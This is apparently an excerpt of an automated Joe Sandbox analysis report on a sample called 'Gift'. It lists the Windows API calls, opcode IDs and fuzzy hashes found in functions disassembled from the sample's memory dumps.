                                                                          • String ID:
                                                                          • API String ID: 2576544623-0
                                                                          • Opcode ID: 657f9a6c316cc6fe0080faa6159d3df2cff19daa4027cd687ddda0e96da2ada4
                                                                          • Instruction ID: 0e71807dc2df87e0836f5ede854553f3a98609a1103a1cdc0b94cf41adce6067
                                                                          • Opcode Fuzzy Hash: 657f9a6c316cc6fe0080faa6159d3df2cff19daa4027cd687ddda0e96da2ada4
                                                                          • Instruction Fuzzy Hash: 49517AB1114310AFD311EF24D886E6BB7E8EF99700F50492EF995972A1EB70A914CB92
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                          • Instruction ID: 16aa5916e0019d26d9d692eabbbcee2df70097de2a70d5f1928f179a2fcf3b91
                                                                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                          • Instruction Fuzzy Hash: 5E41A53172060E9BDB28AE69C8A097FF7A5AF443E0B24813DEA55C7650D7F19D608B44
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0032A68A
                                                                          • __itow.LIBCMT ref: 0032A6BB
                                                                            • Part of subcall function 0032A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0032A976
                                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0032A724
                                                                          • __itow.LIBCMT ref: 0032A77B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$__itow
                                                                          • String ID:
                                                                          • API String ID: 3379773720-0
                                                                          • Opcode ID: 030028c7b37deebb43cec74f72454460e635ced1a8c86014da8cd607790aa03c
                                                                          • Instruction ID: ae5c92aafbc008285518f56b4a60eef7c7874e3c7392fafa89e2726291da4218
                                                                          • Opcode Fuzzy Hash: 030028c7b37deebb43cec74f72454460e635ced1a8c86014da8cd607790aa03c
                                                                          • Instruction Fuzzy Hash: B041D170A00758AFDF22EF55D846BEE7BB9EF44750F440029F905A3281DB709A64CBA2
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 003470BC
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003470CC
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00347130
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0034713C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                                          • String ID:
                                                                          • API String ID: 2214342067-0
                                                                          • Opcode ID: 10aaf7de5697a087e646f039f7eed6b3ffc5bc282c698181d7ca9ef354cd01aa
                                                                          • Instruction ID: 1a68d2e8b503df5af2c302ca5db6efb104c946a75111e097736c24ac9f335bd3
                                                                          • Opcode Fuzzy Hash: 10aaf7de5697a087e646f039f7eed6b3ffc5bc282c698181d7ca9ef354cd01aa
                                                                          • Instruction Fuzzy Hash: 7B419D716502106FEB25BF24DC8AF2A77E9AB04B14F048459FA599F3D2DBB0AD108F91
                                                                          APIs
                                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00360980), ref: 00346B92
                                                                          • _strlen.LIBCMT ref: 00346BC4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _strlen
                                                                          • String ID:
                                                                          • API String ID: 4218353326-0
                                                                          • Opcode ID: 6e7f9f451dbf37d418a3991e33fd3d48aed7f64b73354a6ad91a113d717adbb1
                                                                          • Instruction ID: 103e5f0a430416925df2ba9d015efb146405df04166773cad3f1eb55e3d691d3
                                                                          • Opcode Fuzzy Hash: 6e7f9f451dbf37d418a3991e33fd3d48aed7f64b73354a6ad91a113d717adbb1
                                                                          • Instruction Fuzzy Hash: 2B41BE71600218AFCB15FFA5DCD2EAEB3E9EF55310F108155F81A9B292DB30AD11CA91
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00358F03
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: 12f01b032bbf00f798a31501a960a79fae39a06baf88c5ad66ba4c3123d0e500
                                                                          • Instruction ID: 486d6cc1b60ef49a12f8de7aaf715f4b290c93cae5a74b406ecc7876aa9cd40b
                                                                          • Opcode Fuzzy Hash: 12f01b032bbf00f798a31501a960a79fae39a06baf88c5ad66ba4c3123d0e500
                                                                          • Instruction Fuzzy Hash: 6131C034614108AEEB279B14EC4AFA937AAEB09312F144502FE41F61F1CF7199588A51
                                                                          APIs
                                                                          • ClientToScreen.USER32(?,?), ref: 0035B1D2
                                                                          • GetWindowRect.USER32(?,?), ref: 0035B248
                                                                          • PtInRect.USER32(?,?,0035C6BC), ref: 0035B258
                                                                          • MessageBeep.USER32(00000000), ref: 0035B2C9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1352109105-0
                                                                          • Opcode ID: f5235360d673c287091a813fe4c1001709f268b16cb7bce5ae3d03c6a294173f
                                                                          • Instruction ID: e76c72dc99d77b9b09dd48a8b87203a716268054d65a6675331c51ce687dc4f4
                                                                          • Opcode Fuzzy Hash: f5235360d673c287091a813fe4c1001709f268b16cb7bce5ae3d03c6a294173f
                                                                          • Instruction Fuzzy Hash: B8418D30A04115DFCB12CF58C885EADBBF9FB49352F1588A9E8189B260D731A849CF60
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00331326
                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00331342
                                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003313A8
                                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003313FA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 0cbc5b1aaa7d18707e3d26ee9752e9d7726a983d330c26f83a966cae3a3926a3
                                                                          • Instruction ID: 4001b05efeffe929745f6d3b6aa6342883fd7c0761ba77a98eee6ec3697fc365
                                                                          • Opcode Fuzzy Hash: 0cbc5b1aaa7d18707e3d26ee9752e9d7726a983d330c26f83a966cae3a3926a3
                                                                          • Instruction Fuzzy Hash: 97316934A44208AEFF378A25CC86BFEBBB9AB45330F04831AF49152AD1D3748D419B91
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00331465
                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00331481
                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 003314E0
                                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00331532
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                          • String ID:
                                                                          • API String ID: 432972143-0
                                                                          • Opcode ID: 67d4d722ab891b1f1c94c6cc7fc2f79a14f70e0e09be9c63b62246f78b6f85e9
                                                                          • Instruction ID: bb35932411ee5c65f4ad25e6ac39d4f72fa825b5017830f7c8c5dd60d5cbfd00
                                                                          • Opcode Fuzzy Hash: 67d4d722ab891b1f1c94c6cc7fc2f79a14f70e0e09be9c63b62246f78b6f85e9
                                                                          • Instruction Fuzzy Hash: F0317B309402185EFF3B8B66DC85BFFBBB9AB85310F09831AE481521D1C3788D518BA1
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0030642B
                                                                          • __isleadbyte_l.LIBCMT ref: 00306459
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00306487
                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003064BD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: f3fd2346ce81e13da87f0282f121bf707a3797972e29be76a3504e2607083271
                                                                          • Instruction ID: 08d75344c990b953891afffb831c99fe3d734ccfadb3aefd398afc69b6c66a0f
                                                                          • Opcode Fuzzy Hash: f3fd2346ce81e13da87f0282f121bf707a3797972e29be76a3504e2607083271
                                                                          • Instruction Fuzzy Hash: 4531D231601256AFDB228F76CC96BBB7BA9FF41320F164029E8248B1D5DB31E860DB50
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 0035553F
                                                                            • Part of subcall function 00333B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00333B4E
                                                                            • Part of subcall function 00333B34: GetCurrentThreadId.KERNEL32 ref: 00333B55
                                                                            • Part of subcall function 00333B34: AttachThreadInput.USER32(00000000,?,003355C0), ref: 00333B5C
                                                                          • GetCaretPos.USER32(?), ref: 00355550
                                                                          • ClientToScreen.USER32(00000000,?), ref: 0035558B
                                                                          • GetForegroundWindow.USER32 ref: 00355591
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Similarity
                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                          • String ID:
                                                                          • API String ID: 2759813231-0
                                                                          • Opcode ID: df900ee20ff9228749baa70ecc7a17ae204955ed222b424d1fd59922c51e1644
                                                                          • Instruction ID: adf719f02a47a2d9ef771a410c5e88536393315aa38fd7938e8c9a3390752b94
                                                                          • Instruction Fuzzy Hash: 80312A71900108AFDB05EFA5D8859EFB7FDEF98304F10406AE915E7211EA71AE548FA1
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • GetCursorPos.USER32(?), ref: 0035CB7A
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0030BCEC,?,?,?,?,?), ref: 0035CB8F
                                                                          • GetCursorPos.USER32(?), ref: 0035CBDC
                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0030BCEC,?,?,?), ref: 0035CC16
                                                                          Similarity
                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                          • String ID:
                                                                          • API String ID: 2864067406-0
                                                                          • Opcode ID: 5df4f45bffc3ec7be1f16a30c0483310f4e02db1f4300c9e30b3eb30e4c629d1
                                                                          • Instruction ID: 945d0c059a4509722732691cd6f1713dc2315b4614552425ab2d435904d54868
                                                                          • Instruction Fuzzy Hash: 1D31D234610118AFCB168F94CC5AEFA7BB9EB09311F044099FD0597271C3325D50EFA0
                                                                          APIs
                                                                          • __setmode.LIBCMT ref: 002F0BE2
                                                                            • Part of subcall function 002E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00337E51,?,?,00000000), ref: 002E4041
                                                                            • Part of subcall function 002E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00337E51,?,?,00000000,?,?), ref: 002E4065
                                                                          • _fprintf.LIBCMT ref: 002F0C19
                                                                          • OutputDebugStringW.KERNEL32(?), ref: 0032694C
                                                                            • Part of subcall function 002F4CCA: _flsall.LIBCMT ref: 002F4CE3
                                                                          • __setmode.LIBCMT ref: 002F0C4E
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                          • String ID:
                                                                          • API String ID: 521402451-0
                                                                          • Opcode ID: 156c8c64feee2eb5815deb0729a7b929481e51d9793bcde4708b4adc025ad8ce
                                                                          • Instruction ID: 79934b1ceb973f364791d85f460a986dfdc05ce6194b5324eba94d71d9bf7c10
                                                                          • Instruction Fuzzy Hash: 161127319242086ACB09B7B4EC879BFF76D9F40360F140126F304972C2DFB11DA64BA1
                                                                          APIs
                                                                            • Part of subcall function 00328D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00328D3F
                                                                            • Part of subcall function 00328D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00328D49
                                                                            • Part of subcall function 00328D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D58
                                                                            • Part of subcall function 00328D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D5F
                                                                            • Part of subcall function 00328D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00328D75
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003292C1
                                                                          • _memcmp.LIBCMT ref: 003292E4
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0032931A
                                                                          • HeapFree.KERNEL32(00000000), ref: 00329321
                                                                          Similarity
                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                          • String ID:
                                                                          • API String ID: 1592001646-0
                                                                          • Opcode ID: 4cf573cadf7d5e850f81bf4949fdef37735cced4266938324ae575682056c797
                                                                          • Instruction ID: 977a64b8cea898d02eb3375052e88a4cb27c297d3a3028c079618876603afa87
                                                                          • Instruction Fuzzy Hash: 46219D31E40219EFDF15DFA4D949BEEB7B8FF44301F05805AE944AB290D770AA04CBA0
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 003563BD
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003563D7
                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003563E5
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003563F3
                                                                          Similarity
                                                                          • API ID: Window$Long$AttributesLayered
                                                                          • String ID:
                                                                          • API String ID: 2169480361-0
                                                                          • Opcode ID: 921e638a1242d399ecd3b676e8b64b8bfd5dc1e7acef6f222f01fba0230a512f
                                                                          • Instruction ID: 69789281681825765b7160d3af7e36b5ae546f28b4685db402ee012ba3f4066a
                                                                          • Instruction Fuzzy Hash: 7B11DF35304424AFD706AB24DC46FBA77ADEF45321F148119F916CB2F2CBA0AD108B90
                                                                          APIs
                                                                            • Part of subcall function 0032F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0032E46F,?,?,?,0032F262,00000000,000000EF,00000119,?,?), ref: 0032F867
                                                                            • Part of subcall function 0032F858: lstrcpyW.KERNEL32(00000000,?), ref: 0032F88D
                                                                            • Part of subcall function 0032F858: lstrcmpiW.KERNEL32(00000000,?,0032E46F,?,?,?,0032F262,00000000,000000EF,00000119,?,?), ref: 0032F8BE
                                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0032F262,00000000,000000EF,00000119,?,?,00000000), ref: 0032E488
                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0032E4AE
                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0032F262,00000000,000000EF,00000119,?,?,00000000), ref: 0032E4E2
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                          • String ID: cdecl
                                                                          • API String ID: 4031866154-3896280584
                                                                          • Opcode ID: 9dca07adc4fd900546a7a17fc74a5e4a50fde5da686df5cc881416f3863d97f9
                                                                          • Instruction ID: d020173e6e4c48db49d7aee2fd35b2319dfb565fe9ad92a60639d1d4602e34f4
                                                                          • Instruction Fuzzy Hash: 2B11933A100355AFDB26AF34EC46D7A77B9FF46350B51802AF906CB2A0EB71D950C791
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00305331
                                                                            • Part of subcall function 002F593C: __FF_MSGBANNER.LIBCMT ref: 002F5953
                                                                            • Part of subcall function 002F593C: __NMSG_WRITE.LIBCMT ref: 002F595A
                                                                            • Part of subcall function 002F593C: RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,00000004,?,?,002F1003,?), ref: 002F597F
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 2c56bf9749efdcbddaad8dbb5a3f9aa210340fd38c6ae3a4cd9a19963dd1f14e
                                                                          • Instruction ID: 1b108371a5fa02297e360d384a211b930a71c5fdbb82f44cae22f87cd657839f
                                                                          • Instruction Fuzzy Hash: 3B112736517A19AFCB272F70AC1177BB79C9F143E1F214976FA489A2D0CEB089508F80
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00334385
                                                                          • _memset.LIBCMT ref: 003343A6
                                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003343F8
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00334401
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                          • String ID:
                                                                          • API String ID: 1157408455-0
                                                                          • Opcode ID: dbdcc823e721d1ef8719150fde5326eaaff65a8f8803d37bb772d23064c750e7
                                                                          • Instruction ID: 968de9a45af9fd6f4afa37ed03537d44158bf58f9d63b7358309dec87fff13ad
                                                                          • Instruction Fuzzy Hash: 31110D759012287AD7319BA5AC4DFEBBB7CEF45760F10459AF908D7280D6744E808BA4
                                                                          APIs
                                                                            • Part of subcall function 002E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00337E51,?,?,00000000), ref: 002E4041
                                                                            • Part of subcall function 002E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00337E51,?,?,00000000,?,?), ref: 002E4065
                                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00346A84
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00346A8F
                                                                          • _memmove.LIBCMT ref: 00346ABC
                                                                          • inet_ntoa.WSOCK32(?), ref: 00346AC7
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 1504782959-0
                                                                          • Opcode ID: e0426cbef224ec9d1c7b50c314dbaf55c4f923387a8b519ff6b3cced69af5ccb
                                                                          • Instruction ID: 8778012800e9ec309fdd0bcb1fe7e0f1558fa316b559affc4ab74e5294584d5d
                                                                          • Opcode Fuzzy Hash: e0426cbef224ec9d1c7b50c314dbaf55c4f923387a8b519ff6b3cced69af5ccb
                                                                          • Instruction Fuzzy Hash: 6E115171510109AFCB05FFA4CD46CEEB7B9AF14310B148065F506A7262DF71AE24CF91
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 002D16B4
                                                                          • GetClientRect.USER32(?,?), ref: 0030B93C
                                                                          • GetCursorPos.USER32(?), ref: 0030B946
                                                                          • ScreenToClient.USER32(?,?), ref: 0030B951
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 4127811313-0
                                                                          • Opcode ID: cba683ff3b113b9a2e12be83f8f3c5c0b200697ebc7e0939e24a562ec5c34f49
                                                                          • Instruction ID: 135fed85ce39d389a621c2e4dbb73b7d7bf03b75b8b715ac93b19fbd5d5b3a38
                                                                          • Opcode Fuzzy Hash: cba683ff3b113b9a2e12be83f8f3c5c0b200697ebc7e0939e24a562ec5c34f49
                                                                          • Instruction Fuzzy Hash: 5C114335A20019BBCB09EFA8D88ADBE77BDEB05300F144456F901E7650C370AE61CBA1
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00329719
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0032972B
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00329741
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0032975C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
